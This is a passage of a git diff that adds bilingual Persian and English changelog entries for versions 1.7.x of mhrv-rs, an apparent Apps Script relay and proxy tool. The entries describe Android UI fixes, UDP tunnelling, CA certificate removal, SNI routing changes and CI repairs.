([#255](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/255)): دکمهٔ Copy کنار Clear در Live Log اضافه شد. خط‌های log الان قابل selection هستن. تا قبل از این، گرفتن log از گوشی نیازمند `adb logcat` بود — برای کاربرهایی که issue با logcat تجربه ندارن، debug کردن سخت بود. 
ممنون از @dazzling-no-more +• اضافه کردن چندین deployment ID به‌صورت یکجا در نسخهٔ اندروید ([#257](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/257)): فیلد "+ Add" حالا multi-line هست و paste کردن لیست IDها (با newline، کاما، یا semicolon جدا شده) رو می‌پذیره. paste در یه entry موجود هم automatic بهش split و expand می‌شه. تا قبل از این، اضافه کردن ۶ تا ID نیازمند ۶ بار tap "+ Add" بود. ممنون از @dazzling-no-more +• رفع باگ "google_only mode: plain HTTP proxy requests are not supported" ([#256](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/256)): تایپ کردن `http://example.com` (بدون https) در browser در حالت google_only یه ۵۰۲ می‌داد، در حالی که `https://example.com` (CONNECT) خوب fall-through می‌کرد به direct TCP. حالا plain HTTP proxy request هم passthrough می‌شه (با حفظ `upstream_socks5` اگه ست شده). ۴ تا unit test جدید برای parsing absolute-form URI، fallback به Host header، و edge cases IPv6. ممنون از @dazzling-no-more +--- +• Add twitter.com to X/Twitter URL normalization ([#245](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/245)): the GraphQL `?variables=...` shortening previously only matched `x.com`. Users running the "Control Panel for Twitter" extension (which redirects everything back to `twitter.com`) lost the shortening and hit `URI Too Long` from Apps Script. Now matches both domains. Thanks Parsa307 +• Add ability to copy logs in Android ([#255](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/255)): Copy button added next to Clear in the Live Log pane; log lines are now selectable. Before this, getting logs off the device required tethering with `adb logcat` — a barrier for users without that experience. Thanks @dazzling-no-more +• Add bulk parser for deployment IDs in Android ([#257](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/257)): the "+ Add" field is now multi-line and accepts a paste of multiple IDs separated by whitespace/newline/comma/semicolon. 
Pasting into an existing entry also auto-splits and expands. Adding 6 IDs used to require 6 separate "+ Add" taps. Thanks @dazzling-no-more +• Fix "google_only mode: plain HTTP proxy requests are not supported" 502 ([#256](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/256)): typing `http://example.com` (without https) in the browser in google_only mode returned a 502, even though `https://example.com` (CONNECT) fell through cleanly to direct TCP. Plain-HTTP proxy requests now passthrough too (honoring `upstream_socks5` if set). 4 new unit tests covering absolute-form URI parsing, Host-header fallback, and IPv6 edge cases. Thanks @dazzling-no-more diff --git a/docs/changelog/v1.7.0.md b/docs/changelog/v1.7.0.md new file mode 100644 index 00000000..bbbd940e --- /dev/null +++ b/docs/changelog/v1.7.0.md @@ -0,0 +1,8 @@ + +• پشتیبانی native از پروتکل udpgw در Full mode ([#222](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/222)): tunnel-node حالا یه virtual session جدید برای آدرس magic `198.18.0.1:7300` داره که tun2proxy اندروید بهش وصل می‌شه. به جای یه session UDP per-destination، تمام UDP از همون یه TCP persistent tunnel می‌گذره. **نتیجه**: تماس صوتی/تصویری Telegram و Google Meet در Full mode روی اندروید کار می‌کنن (تا قبل از این، سرعت شناوری STUN/RTP زیاد بود برای session-per-destination polling). QUIC (UDP/443) و DNS (UDP/53) به‌صورت گاردبل از udpgw مسدود می‌شن — مرورگرها به TCP/HTTPS fallback می‌کنن (سریع‌تر از QUIC over batched relay)، و DNS از virtual DNS tun2proxy استفاده می‌کنه (پایدارتر). **نیاز به redeployment image Docker tunnel-node داره**: `docker pull ghcr.io/therealaleph/mhrv-tunnel-node:1.7.0`. 
ممنون از @yyoyoian-pixel +• چیدمان مجدد صفحهٔ اصلی اندروید برای لیست‌های بلند deployment-ID ([#258](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/258)، closes [#246](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/246)): دکمهٔ Connect/Disconnect حالا زیر فیلد Mode pinned هست — قبلاً اگه ۱۰ تا deployment ID داشتید، باید کل لیست رو scroll می‌کردید برای رسیدن به Connect. App picker هم حالا appهای از قبل انتخاب‌شده رو در بالای لیست نشون می‌ده، نه پراکنده در ترتیب alphabetical. ممنون از @dazzling-no-more +• tooling release-drafter + prepare-release ([#260](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/260)): release-drafter به‌صورت تدریجی PRهای merge شده رو در یه draft release جمع می‌کنه که در زمان tag دادن آماده هست. workflow `prepare-release.yml` (manual dispatch) خودکار `Cargo.toml` و `build.gradle.kts` رو bump می‌کنه و یه stub `docs/changelog/v.md` می‌سازه که maintainer فقط Persian half + verb tense fixes رو کامل می‌کنه. flow release موجود (matrix build → GH release → Telegram) دست نخورده. ممنون از @dazzling-no-more +--- +• Native udpgw protocol support in Full mode ([#222](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/222)): tunnel-node now hosts a virtual session at the magic address `198.18.0.1:7300` that Android's tun2proxy connects to. Instead of a UDP session per destination, all UDP flows through one persistent TCP tunnel. **Result**: Telegram voice/video calls and Google Meet now work in Full mode on Android (per-destination polling previously stalled under STUN/RTP flow counts). QUIC (UDP/443) and DNS (UDP/53) are blocked from udpgw as a belt-and-suspenders guard — browsers fall back to TCP/HTTPS (faster through the batch pipeline than QUIC), and DNS uses tun2proxy's virtual DNS (more reliable). **Requires redeploying the tunnel-node Docker image**: `docker pull ghcr.io/therealaleph/mhrv-tunnel-node:1.7.0`. 
Thanks @yyoyoian-pixel +• Restructured Android home screen for long deployment-ID lists ([#258](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/258), closes [#246](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/246)): Connect/Disconnect button is now pinned right under the Mode field — previously, with 10+ deployment IDs the user had to scroll past the entire list to reach Connect every session. App picker now shows pre-selected apps at the top instead of scattered through the alphabetical list. Thanks @dazzling-no-more +• Release-drafter + prepare-release tooling ([#260](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/260)): release-drafter incrementally accumulates merged-PR titles into a draft release that's ready when it's tag time. The `prepare-release.yml` workflow (manual dispatch) auto-bumps `Cargo.toml` and `build.gradle.kts` and writes a `docs/changelog/v.md` stub the maintainer only has to translate to Persian and fix verb tenses on. Existing release flow (matrix build → GH release → Telegram) untouched. Thanks @dazzling-no-more diff --git a/docs/changelog/v1.7.1.md b/docs/changelog/v1.7.1.md new file mode 100644 index 00000000..79582d63 --- /dev/null +++ b/docs/changelog/v1.7.1.md @@ -0,0 +1,4 @@ + +• امکان حذف CA به‌صورت verified ([#121](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/121)): فلگ جدید `mhrv-rs --remove-cert` (CLI) و دکمهٔ **Remove CA** در UI دسکتاپ. CA رو از trust store سیستم‌عامل (Keychain مک، anchor dirs لینوکس، Trusted Root ویندوز)، NSS مرورگرها (Firefox/Chrome در لینوکس)، و فولدر `ca/` روی دیسک پاک می‌کنه. **`config.json` و deployment Apps Script شما دست نمی‌خوره — نیاز به redeploy نیست.** قبل از هر کاری با store، یه trust verification by-name انجام می‌شه؛ اگه remove از سیستم‌عامل fail بشه، browser state دست نمی‌خوره و حالت `RemovalIncomplete` گزارش می‌شه (retry idempotent). 
در Unix، اگه با sudo اجرا بشه، HOME رو به user واقعی re-root می‌کنه تا path‌های user-scoped (NSS profile، login keychain) به /root نرن. ۲۹ unit test جدید پوشش‌دهی pure logic. تست شده end-to-end در ویندوز، و **در v1.7.1 من مسیر macOS رو هم با hardware واقعی verify کردم** (login keychain delete کار می‌کنه، NSS certutil-missing graceful fallback می‌ده). مسیر Linux منتظر تست از کاربرها. ممنون از @dazzling-no-more +--- +• Verified CA removal ([#121](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/121)): new `mhrv-rs --remove-cert` flag (CLI) and a **Remove CA** button in the desktop UI. Clears the CA from the OS trust store (macOS Keychain, Linux anchor dirs, Windows Trusted Root), NSS browser stores (Firefox/Chrome on Linux), and the on-disk `ca/` directory. **`config.json` and your Apps Script deployment are never touched — no redeploy needed.** A by-name trust verification runs *before* any browser-state mutation; if the OS removal fails, browser state is left alone and the call returns `RemovalIncomplete` (idempotent retries). On Unix, if invoked under sudo, `HOME` is re-rooted to the real user so user-scoped paths (NSS profile, login keychain) target the user, not root. 29 new unit tests covering the pure logic. Tested end-to-end on Windows by the contributor, and **the macOS path was verified on real hardware** during merge (login-keychain delete works; NSS-certutil-missing path falls back cleanly). Linux paths await user testing. 
Thanks @dazzling-no-more diff --git a/docs/changelog/v1.7.10.md b/docs/changelog/v1.7.10.md new file mode 100644 index 00000000..6af68b83 --- /dev/null +++ b/docs/changelog/v1.7.10.md @@ -0,0 +1,8 @@ + +• رفع باگ "GET کامل غیرضروری وقتی Apps Script body gzip رو decode می‌کنه" ([#337](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/337)): وقتی Apps Script یه gzip body رو decode می‌کرد ولی Content-Range origin رو unchanged نگه می‌داشت، validation strict ما اون response رو reject می‌کرد + یک GET کامل دوباره می‌فرستادیم — quota Apps Script هدر می‌رفت. fix carve-out اضافه می‌کنه: اگر Content-Range proves entity کامل در probe اول گنجیده، 206 رو به 200 rewrite کنیم بدون refetch. validation strict برای real Range request‌های client + chunkهای بعدی حفظ شده. همچنین تشخیص quota error برای string‌های آلمانی (`bandbreitenkontingent`، `datenübertragungsrate`) و generic (`bandwidth`، `transfer rate`، `limit exceeded`) اضافه شد، تا deployment‌هایی که رو quota account‌های Google غیرانگلیسی هستند به‌درستی blacklist بشن. ممنون از @freeinternet865 +• رفع UI Android "Config detected in clipboard" که روی Android 13+ پس از resume کار نمی‌کرد ([#344](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/344)): Android 13+ دسترسی clipboard background-to-foreground رو محدود می‌کنه — auto-detect ساکت empty می‌گرفت + banner ظاهر نمی‌شد. fix: یک دکمهٔ permanent **Paste** که روی tap clipboard رو می‌خونه (user interaction permission می‌ده در همه versionها). دکمهٔ Export به‌صورت icon-only تا row بهینه باقی بمونه. ممنون از @yyoyoian-pixel +• Fix CI workflow incompatibility for Win7 i686 build ([#318 follow-up](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/318)): job pinned-Rust-1.77.2 برای target Win7 i686 fail می‌کرد چون `Cargo.lock` (تولید شده توسط Rust ≥1.78) از lockfile version 4 استفاده می‌کرد + Rust 1.77 فقط version 3 رو می‌فهمه. 
regenerate Cargo.lock فقط روی job pinned اضافه شد — مهم: artifact `mhrv-rs-windows-i686.zip` که در v1.7.9 missing بود، در v1.7.10 reappear می‌کنه (Win7 SP1-loadable). +--- +• Fix "unnecessary fallback full GET when Apps Script decodes a gzip body" ([#337](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/337)): when Apps Script decoded a gzip body but echoed the origin's compressed `Content-Range` unchanged, our strict validator rejected the response and we'd retry with a full GET — wasting Apps Script quota. The fix adds a carve-out: if `Content-Range` proves the entity already fits in the synthetic first probe, rewrite the 206 to a 200 and skip the refetch. Strict validation is still applied to real client `Range` requests and to later chunks. Also adds quota-error string matching for German (`bandbreitenkontingent`, `datenübertragungsrate`) and generic (`bandwidth`, `transfer rate`, `limit exceeded`) phrasings, so deployments hitting quota under non-English Google account locales now blacklist correctly. Thanks @freeinternet865. +• Fix Android "Config detected in clipboard" banner that silently broke on Android 13+ after resume ([#344](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/344)): Android 13+ restricts background-to-foreground clipboard access, so `getPrimaryClip()` during recomposition silently returned empty — the banner never showed. Fix: replace the auto-detect banner with a permanent **Paste** button that reads on tap (user interaction grants clipboard access on every Android version). Export button becomes icon-only to keep the row compact. Thanks @yyoyoian-pixel. +• Fix the CI Win7 i686 build that silently regressed in v1.7.9 ([#318](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/318) follow-up): the pinned-Rust-1.77.2 job for the i686 target failed because `Cargo.lock` (generated by stable Rust ≥1.78) uses lockfile version 4, which Rust 1.77 doesn't understand. 
The job now regenerates the lockfile with the pinned toolchain before building. The `mhrv-rs-windows-i686.zip` artifact that disappeared from the v1.7.9 release page reappears in v1.7.10 (and now actually loads on Win7 SP1). diff --git a/docs/changelog/v1.7.11.md b/docs/changelog/v1.7.11.md new file mode 100644 index 00000000..4de1518d --- /dev/null +++ b/docs/changelog/v1.7.11.md @@ -0,0 +1,4 @@ + +• v1.7.10 release page assets منتشر نشد (CI failures): دو bug همزمان بودن — (۱) target `i686-pc-windows-msvc` که در v1.7.7 برای Win7 32-bit اضافه شده بود، در v1.7.10 fail کرد چون Rust 1.77.2 (آخرین stable Win7-compat) نمی‌تونه manifest crate‌های مدرن مثل `time` 0.3.47 رو parse کنه؛ pinning transitive crate‌ها در هر release dep MSRV بمپ می‌کنن غیرقابل دفاع است. (۲) job `release` با `actions/download-artifact@v4` با ۵-retry-exhausted error fail شد. **Fix:** target i686 از matrix حذف شد (کاربران Win7 ۳۲ بیتی باید self-build کنن — instructions در [#318](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/318))؛ release و telegram jobs به `gh run download` با retry loop ۳-attempt تبدیل شدن. v1.7.11 release اولین کاملی هست که از v1.7.9 منتشر می‌شه با همه fixهای v1.7.10 (Apps Script range probe + Android Paste button) plus این workflow fix. +--- +• v1.7.10 release page assets failed to publish (CI failures): two concurrent bugs — (1) the `i686-pc-windows-msvc` target added in v1.7.7 for Win7 32-bit support broke in v1.7.10 because Rust 1.77.2 (the last stable that produces Win7-compatible binaries) can't parse the manifest of modern transitive crates like `time` 0.3.47; pinning transitives at every release where a dep bumps MSRV is brittle and unsustainable. (2) The `release` job's `actions/download-artifact@v4` step hit a 5-retries-exhausted error. 
**Fix:** dropped the i686 target from the matrix entirely (Win7 32-bit users must self-build now — instructions in [#318](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/318)); the `release` and `telegram` jobs now use `gh run download` with a 3-attempt retry loop. v1.7.11 is the first complete release published since v1.7.9 and ships all the v1.7.10 fixes (Apps Script range probe handling per #337, Android Paste button per #344) along with this workflow repair. diff --git a/docs/changelog/v1.7.2.md b/docs/changelog/v1.7.2.md new file mode 100644 index 00000000..22be861d --- /dev/null +++ b/docs/changelog/v1.7.2.md @@ -0,0 +1,4 @@ + +• import/export کانفیگ در نسخهٔ اندروید با QR code، کلیپ‌بورد، deep link، و share sheet ([#266](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/266)): انتقال کانفیگ بین دستگاه‌ها با یک تپ. **Export**: یک دیالوگ یکپارچه با QR code + رشتهٔ فشرده + دکمهٔ کپی، یا Share از طریق هر اپ (تلگرام، WhatsApp، ایمیل). فیلدهای device-specific (پورت‌ها، حالت VPN/proxy، splitMode) export نمی‌شن، فقط فیلدهای منطقی (mode، script_ids، auth_key، sni_hosts، passthrough_hosts، upstream_socks5). encoding با DEFLATE compression + base64 — کانفیگ معمولی ~۲۰۰ کاراکتر می‌شه به‌جای ~۸۰۰. **Import**: clipboard banner خودکار وقتی مهرو متن `mhrv-rs://` یا JSON خام در clipboard می‌بینه، scanner QR، یا deep link `mhrv-rs://...` (تپ روی لینک در هر اپ). **هر import نیاز به تأیید صریح کاربر داره** — قبل از overwrite شدن کانفیگ فعلی، یه دیالوگ deployment IDهای جدید رو نشون می‌ده و هشدار میده که "این لینک ترافیک شما رو از طریق این deployment IDها مسیریابی می‌کنه — فقط از منابع قابل اعتماد import کنید." این مهمه چون کانفیگ شامل auth_key هست. ممنون از @yyoyoian-pixel +--- +• Config import/export on Android via QR code, clipboard, deep link, and share sheet ([#266](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/266)): one-tap config sharing between devices. 
**Export**: a unified dialog with QR code + compressed text string + copy button, or Share via any app (Telegram, WhatsApp, email). Device-specific fields (ports, VPN/proxy mode, splitMode) are not exported — only logical config (mode, script_ids, auth_key, sni_hosts, passthrough_hosts, upstream_socks5). DEFLATE compression + base64 encoding shrinks a typical config from ~800 to ~200 chars. **Import**: clipboard banner auto-appears when mhrv-rs detects `mhrv-rs://...` or raw JSON in clipboard, QR scanner, or deep link `mhrv-rs://...` (tap from any app). **Every import path requires explicit user confirmation** — before the current config is overwritten, a dialog displays the new deployment IDs and warns "this link routes your traffic through these deployment IDs — only import from sources you trust." Important because the config contains `auth_key`. Thanks @yyoyoian-pixel diff --git a/docs/changelog/v1.7.3.md b/docs/changelog/v1.7.3.md new file mode 100644 index 00000000..d7ae76cf --- /dev/null +++ b/docs/changelog/v1.7.3.md @@ -0,0 +1,4 @@ + +• حذف نیاز به فورک tun2proxy ([#271](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/271)): v1.7.0 از یه فورک شخصی tun2proxy (با پارامتر `udpgw_server` در JNI) استفاده می‌کرد چون upstream هنوز feature flag `udpgw` رو منتشر نکرده بود. حالا که tun2proxy 0.7.21 رسماً روی crates.io با feature flag `udpgw` در دسترسه + maintainer toolchain CLI API رو به‌عنوان مسیر صحیح برای کاربران Android معرفی کرد، فورک رو حذف می‌کنیم. روش جدید: mhrv-rs از طریق `dlsym` در زمان اجرا تابع `tun2proxy_run_with_cli_args` رو از `libtun2proxy.so` resolve می‌کنه و CLI args ساده می‌فرسته (`--proxy socks5://127.0.0.1:1081 --tun-fd --udpgw-server 198.18.0.1:7300 ...`). نه فورک، نه `[patch.crates-io]`، نه commit SHA. وقتی tun2proxy update می‌شه، فقط نسخهٔ crates.io رو bump می‌کنیم. 
ممنون از @yyoyoian-pixel +--- +• Drop the tun2proxy fork dependency ([#271](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/271)): v1.7.0 used a personal fork of tun2proxy (with a `udpgw_server` parameter added to the JNI signature) because upstream hadn't published the `udpgw` feature flag yet. With tun2proxy 0.7.21 now on crates.io with `udpgw` feature flag, and the upstream maintainer pointing callers at the C-style CLI API as the recommended path for Android, we drop the fork. New approach: mhrv-rs resolves `tun2proxy_run_with_cli_args` from `libtun2proxy.so` at runtime via `dlsym` and passes a simple CLI string (`--proxy socks5://127.0.0.1:1081 --tun-fd --udpgw-server 198.18.0.1:7300 ...`). No fork, no `[patch.crates-io]`, no pinned SHA. Future tun2proxy upgrades are a single Cargo version bump. Thanks @yyoyoian-pixel diff --git a/docs/changelog/v1.7.4.md b/docs/changelog/v1.7.4.md new file mode 100644 index 00000000..869109b1 --- /dev/null +++ b/docs/changelog/v1.7.4.md @@ -0,0 +1,6 @@ + +• رفع باگ "video timeout با send YouTube through relay" ([#275](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/275)): قبلاً وقتی `youtube_via_relay = true` بود، تمام دامنه‌های مرتبط با YouTube از طریق Apps Script رد می‌شدن، شامل `googlevideo.com` (chunkهای video) و `ytimg.com` (thumbnails). نتیجه: یک chunk timeout کل پخش video رو در Firefox abort می‌کرد، و video طولانی به ۶ دقیقه cap اجرای Apps Script می‌خورد. **Fix:** حالا `youtube_via_relay` فقط API/HTML رو از relay رد می‌کنه (`youtube.com`, `youtu.be`, `youtube-nocookie.com`, `youtubei.googleapis.com` — جایی که Restricted Mode enforce می‌شه)، در حالی که CDNهای video/image مستقیماً از Google edge می‌گذرن (`googlevideo.com` که در نسخه‌های قبل اصلاً در لیست SNI rewrite نبود اضافه شد، `ytimg.com`، `ggpht.com`). نتیجه: Restricted Mode بدون قطع شدن video. 
ممنون از @amirabbas117 برای تحلیل دقیق +• Negative-cache برای destinationهای unreachable + pre-warm بزرگ‌تر در startup ([#280](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/280)): گوشی‌های بدون IPv6 وقتی پروب IPv6-only host (مثلاً `ds6.probe.whatismyipaddress.com`) می‌فرستن، 5+ batch Apps Script در ثانیه روی destination تضمین‌fail هدر می‌رفت. حالا cache 30s × 256-entry در `TunnelMux` نگه می‌داره برای destinationهایی که tunnel-node با `Network is unreachable` یا `No route to host` پاسخ داده — short-circuit به `502 Bad Gateway` (HTTP CONNECT) یا `0x04 Host unreachable` (SOCKS5) برای هر retry بعدی. Pre-warm pool startup هم بزرگتر شد (۱۲ تا ۲۴ connection به‌جای ۸) برای کمتر شدن first-use latency. ممنون از @dazzling-no-more +--- +• Fix "video timeout when 'Send YouTube through relay' is on" ([#275](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/275)): previously, `youtube_via_relay = true` routed every YouTube-related domain through Apps Script — including `googlevideo.com` (video chunks) and `ytimg.com` (thumbnails). Result: a single chunk timeout aborted entire Firefox playbacks, and long videos hit Apps Script's 6-min execution cap mid-playback. **Fix:** `youtube_via_relay` now only relays the API/HTML hosts (`youtube.com`, `youtu.be`, `youtube-nocookie.com`, `youtubei.googleapis.com` — where Restricted Mode is enforced), while video/image CDNs go direct via Google edge (`googlevideo.com` was missing from the SNI rewrite list entirely; now added; `ytimg.com`, `ggpht.com` stay on SNI rewrite always). Restricted Mode bypass without breaking playback. Thanks @amirabbas117 for the detailed analysis +• Negative-cache for unreachable destinations + larger startup pre-warm pool ([#280](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/280)): on devices without IPv6, OS/app probes to IPv6-only hostnames (e.g. `ds6.probe.whatismyipaddress.com`) were burning 5+ Apps Script batches per second on a guaranteed-fail destination. 
`TunnelMux` now keeps a 30s × 256-entry cache of destinations the tunnel-node returned `Network is unreachable` / `No route to host` for, and short-circuits subsequent CONNECTs with `502 Bad Gateway` (HTTP CONNECT) or `0x04 Host unreachable` (SOCKS5). Startup pre-warm pool also grew (12 → 24 connections) to reduce first-use latency. Thanks @dazzling-no-more diff --git a/docs/changelog/v1.7.5.md b/docs/changelog/v1.7.5.md new file mode 100644 index 00000000..5696630f --- /dev/null +++ b/docs/changelog/v1.7.5.md @@ -0,0 +1,6 @@ + +• گزینهٔ جدید `block_quic` در config برای رد کردن client-side QUIC ([#213](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/213)): با `"block_quic": true` در `config.json`، listener SOCKS5 UDP هر datagramی به مقصد port 443 (یعنی HTTP/3-over-UDP) رو silent drop می‌کنه. browser به TCP/HTTPS fallback می‌کنه (که از مسیر CONNECT معمولی رد می‌شه و از relay می‌گذره). برای کاربرهایی که QUIC TCP-meltdown رو در Full mode تجربه می‌کنن (پهنای باند < 1 Mbps در عوض > 50 Mbps با TCP/HTTPS) خوبه. به‌صورت opt-in (پیش‌فرض false). ممنون از @w0l4i +• release artifacts دوباره به پوشهٔ `releases/` در مخزن commit می‌شن (به درخواست کاربر تلگرام): پس از v1.1.0 این عادت متوقف شده بود — حالا بعد از هر release tag، workflow خودکار فایل‌های pre-built رو در پوشه `releases/` به‌روزرسانی می‌کنه. کاربرانی که به صفحه GitHub Releases دسترسی ندارن (به‌خاطر فیلتر در ایران) می‌تونن از طریق `Code → Download ZIP` به فایل‌های آخرین نسخه برسن. صفحه release رسمی همچنان artifact‌های versioned رو داره — این پوشه fallback هست +--- +• New `block_quic` config option for client-side QUIC drop ([#213](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/213)): set `"block_quic": true` in `config.json` and the SOCKS5 UDP relay silently drops any datagram destined for port 443 (HTTP/3-over-UDP). The client's QUIC stack retries a couple of times and then falls back to TCP/HTTPS, which goes through the regular CONNECT path and through the relay. 
Useful for users seeing QUIC TCP-meltdown in Full mode (sub-1 Mbps where TCP/HTTPS does 50+). Opt-in (default false). Thanks @w0l4i +• Release artifacts now committed back to the in-repo `releases/` folder (per Telegram channel request): the practice was stopped after v1.1.0 — now after every release tag, the workflow auto-refreshes `releases/` with the pre-built binaries. Users behind GitHub-Releases-page filtering can grab the latest version via `Code → Download ZIP`. The official release page still has versioned artifacts; the in-repo folder is the fallback path diff --git a/docs/changelog/v1.7.6.md b/docs/changelog/v1.7.6.md new file mode 100644 index 00000000..58d20ef0 --- /dev/null +++ b/docs/changelog/v1.7.6.md @@ -0,0 +1,4 @@ + +• Revert غلط v1.7.4 برای `googlevideo.com` ([#275](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/275)، [#281](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/281)): v1.7.4 تلاش کرد `googlevideo.com` رو به لیست SNI rewrite اضافه کنه به این تئوری که chunk‌های ویدیو باید از Apps Script relay دور بزنن. **چندین کاربر گزارش دادن که v1.7.4 YouTube رو کاملاً شکست داد** — علت: `googlevideo.com` توسط edge IP‌های جدا "EVA" گوگل serve می‌شه، نه GFE IP عادی که `google_ip` کاربر معمولاً به اون اشاره می‌کنه. SNI-rewrite کردن `googlevideo.com:443` به یه GFE IP باعث TLS handshake failure یا wrong-cert error برای اون کاربرها شد. **رفتار قبل از v1.7.4 برگشته** (chunk‌های ویدیو از مسیر Apps Script relay می‌رن — کندتر ولی روی هر GFE IP قابل اعتماد). تغییرات `youtube_via_relay` carve-out از v1.7.4 (که `ytimg.com` رو از relay پاک کرد) دست نخورده — اون regression جدا بود و درست شده باقی مونده. اگه کاربری در آینده EVA edge IP خودش رو پیکربندی بکنه، یه knob مجزا اضافه می‌کنیم. 
+--- +• Revert v1.7.4 `googlevideo.com` SNI rewrite ([#275](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/275), [#281](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/281)): v1.7.4 added `googlevideo.com` to the SNI rewrite list on the theory that video chunks should bypass the Apps Script relay. **Multiple users reported v1.7.4 broke YouTube entirely** — root cause: `googlevideo.com` is served by Google's separate "EVA" edge IPs, not the regular GFE IPs that `google_ip` typically points at. SNI-rewriting `googlevideo.com:443` to a GFE IP got TLS handshake failures or wrong-cert errors for those users. **Pre-v1.7.4 behaviour is restored** (video chunks go via the Apps Script relay path — slower but reliable on every GFE IP). The other v1.7.4 `youtube_via_relay` carve-out changes (which removed `ytimg.com` from the carve-out) are intact — those were a separate fix that's still correct. If a user ever wants direct googlevideo.com routing, that needs a separate config knob letting them specify their EVA edge IP independently. diff --git a/docs/changelog/v1.7.7.md b/docs/changelog/v1.7.7.md new file mode 100644 index 00000000..13f3cf54 --- /dev/null +++ b/docs/changelog/v1.7.7.md @@ -0,0 +1,6 @@ + +• اضافه شدن build برای ویندوز ۳۲ بیتی (i686-pc-windows-msvc) به matrix release ([#272](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/272), [#288](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/288)): کاربری که سیستم قدیمی ویندوز ۳۲ بیتی داشت درخواست build اختصاصی کرد. حالا artifact ‫`mhrv-rs-windows-i686.zip`‬ هم در release page موجوده. 
ممنون از @amiralishoja برای PR +• رفع باگ "یک deployment معیوب همه ‍session‌ها رو روی cadence legacy گیر می‌اندازه" ([#290](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/290)): قبلاً وقتی یکی از deployment‌ها fast-empty (long-poll نمی‌شناخت) برمی‌گردوند، flag global `server_no_longpoll` فعال می‌شد و کل session‌ها رو روی cadence ۳۰ ثانیه‌ای legacy گیر می‌انداخت — حتی اگه deployment‌های دیگه راحت long-poll می‌کردن. اون flag همچنین هیچ‌وقت reset نمی‌شد، پس tunnel-node بازنشانده تا restart process به مسیر سریع برنمی‌گشت. **Fix:** state per-deployment با TTL ۶۰ ثانیه. flag aggregate فقط وقتی فعال می‌شه که **همه** deployment‌های یکتا mark شده باشن، و خودش رو از روی expiry self-correct می‌کنه. tunnel-node ارتقا داده شده خودش به مسیر long-poll fast بدون restart برمی‌گرده. ۴ تست جدید با `tokio::test(start_paused = true)` پوشش‌دهی timing logic. ممنون از @dazzling-no-more +--- +• Add 32-bit Windows (i686-pc-windows-msvc) to the release matrix ([#272](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/272), [#288](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/288)): a user with a legacy 32-bit Windows machine asked for a dedicated build. `mhrv-rs-windows-i686.zip` now appears alongside the other artifacts on every release page. Thanks @amiralishoja for the PR +• Fix "one degraded deployment drags all sessions onto the legacy cadence" bug ([#290](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/290)): previously, a single fast-empty observation from any one deployment flipped the global `server_no_longpoll` flag, dragging every session onto the 30-second legacy cadence even when the other deployments were happily long-polling. The flag also never reset, so a redeployed/recovered tunnel-node didn't return to the fast path until the mhrv-rs process restart. **Fix:** state is now per-deployment with a 60-second TTL. 
The aggregate flag flips only when **every** unique configured deployment is marked, and self-corrects on read when entries expire. An upgraded tunnel-node rejoins the long-poll fast path on its own. 4 new tests using `tokio::test(start_paused = true)` to cover the timing logic without burning real wall-clock seconds. Thanks @dazzling-no-more diff --git a/docs/changelog/v1.7.8.md b/docs/changelog/v1.7.8.md new file mode 100644 index 00000000..6f7d9030 --- /dev/null +++ b/docs/changelog/v1.7.8.md @@ -0,0 +1,4 @@ + +• Blacklist خودکار deployment با timeout مکرر در batch ([#319](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/319)): قبلاً وقتی یک deployment hang می‌کرد (معمولاً به دلیل `TUNNEL_SERVER_URL` قدیمی که به host از کار افتاده اشاره می‌کرد، یا Apps Script که UrlFetchApp داخلش hang کرده بود)، round-robin مدام trafficرو به همون deployment می‌فرستاد و sessionها timeout می‌خوردند بدون recovery تا restart process. **Fix:** state per-deployment با window ۳۰ ثانیه‌ای — ۳ timeout در پنجره ۳۰ ثانیه‌ای منجر به blacklist با cooldown ۱۲۰ ثانیه می‌شه. هر batch موفق strikeها رو پاک می‌کنه. cooldown کوتاه (۲ دقیقه به‌جای ۱۰ دقیقه برای quota) تا deploymentای که سریع recover می‌شه به‌سرعت برگرده. مستقل از blacklist موجود برای quota-error 